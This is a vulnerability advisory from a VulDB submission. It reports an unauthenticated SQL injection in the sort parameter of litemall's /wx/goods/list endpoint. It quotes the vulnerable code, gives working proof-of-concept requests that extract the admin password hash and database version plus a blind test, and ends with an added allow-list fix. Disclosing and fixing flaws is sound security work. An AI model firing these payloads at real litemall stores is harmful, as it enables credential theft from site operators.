| Title | linlinjava litemall up to 1.8.0 SQL Injection |
|---|---|

Description

A critical vulnerability was found in linlinjava litemall (https://github.com/linlinjava/litemall) up to 1.8.0. It affects the list function of WxGoodsController.java in the front-end WeChat API. Manipulation of the argument sort/order leads to SQL injection.

IMPORTANT: Unlike the previously reported CVEs (CVE-2024-24323, CVE-2024-46382), which require ADMIN authentication via Shiro, this vulnerability exists in the front-end API (/wx/goods/list), which is accessible to REGULAR USERS without admin privileges. This makes it significantly more severe (CVSS 8.8 vs 7.2).

Vulnerable code in WxGoodsController.java:

```java
@GetMapping("list")
public Object list(@RequestParam(defaultValue="add_time") String sort, @RequestParam(defaultValue="desc") String order, ...)
```

LitemallGoodsService.java, lines 121-122:

```java
if (!StringUtils.isEmpty(sort) && !StringUtils.isEmpty(order)) {
    example.setOrderByClause(sort + " " + order);
}
```

MyBatis mapper: `order by ${orderByClause}` (the `${}` placeholder splices the string into the SQL text verbatim, with no parameter binding).

No @Sort whitelist annotation is applied to WxGoodsController.

PoC 1 - Extract admin password hash from the FRONT-END (no admin auth required):

```
GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,(SELECT password FROM litemall_admin LIMIT 1),0x7e))&order=asc&page=1&limit=10
```

Response error: `XPATH syntax error: '~$2a$10$.rEfyBb/GURD9P2p0fRg/OAJ'`

Admin bcrypt hash leaked from the front-end API.

PoC 2 - Extract MySQL version:

```
GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,version(),0x7e))&order=asc
```

Response error: `XPATH syntax error: '~8.0.45~'`

PoC 3 - Boolean-based blind:

```
GET /wx/goods/list?sort=IF(1=1,id,name)&order=asc -> sorted by id
GET /wx/goods/list?sort=IF(1=2,id,name)&order=asc -> sorted by name
```

The differing sort order confirms the injection.

Comparison: CVE-2024-24323/CVE-2024-46382 require an admin Shiro session. THIS vulnerability requires only regular user auth, or no auth at all.

Reporter: berna ([email protected])

| Field | Value |
|---|---|
| Source | https://gist.github.com/A1AAAAAAAAAA1/ab8df4181f9311cb9e7dad905e9aa512 |
| User | berna (UID 97558) |
| Submitted | 2026-04-23 16:38 (1 month ago) |
| Moderated | 2026-05-17 11:36 (24 days later) |
| Status | Accepted |
| VulDB Entry | 364396 [linlinjava litemall up to 1.8.0 Front-end WeChat API WxGoodsController.java list SQL Injection] |
| Points | 20 |
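As an added illustration of the missing check described above (example code, not litemall's own code and not its @Sort/@Order annotation mechanism), the following validates sort and order against a fixed allow-list before they are ever concatenated into the ORDER BY clause; the column list and the class name WxGoodsSortGuard are assumptions.

```java
import java.util.Set;

// Added example, not part of the litemall project: reject any sort/order value
// that is not on a fixed allow-list, so the string handed to
// setOrderByClause() and then to MyBatis' ${orderByClause} can only ever be
// one of a few known "column direction" pairs.
public final class WxGoodsSortGuard {

    // Assumed allow-list of sortable columns for the goods list endpoint.
    private static final Set<String> ALLOWED_SORT =
            Set.of("add_time", "retail_price", "name");
    private static final Set<String> ALLOWED_ORDER = Set.of("asc", "desc");

    private WxGoodsSortGuard() {
    }

    /**
     * Returns a safe "column direction" clause built only from allow-listed
     * tokens, or null when either value is not on the list. The caller should
     * answer with a 400 on null instead of falling back to the raw parameters.
     */
    public static String safeOrderByClause(String sort, String order) {
        if (sort == null || order == null) {
            return null;
        }
        String s = sort.trim();
        String o = order.trim().toLowerCase();
        if (!ALLOWED_SORT.contains(s) || !ALLOWED_ORDER.contains(o)) {
            return null;
        }
        // Only allow-listed literals reach the SQL text; no caller-supplied
        // characters are copied through.
        return s + " " + o;
    }

    public static void main(String[] args) {
        // A legitimate request from the WeChat front end.
        System.out.println("legit:   " + safeOrderByClause("add_time", "desc"));
        // The function-call and conditional shapes used in the report above
        // are not allow-listed column names and are rejected.
        System.out.println("payload: " + safeOrderByClause(
                "extractvalue(1,concat(0x7e,version(),0x7e))", "asc"));
        System.out.println("payload: " + safeOrderByClause("IF(1=1,id,name)", "asc"));
    }
}
```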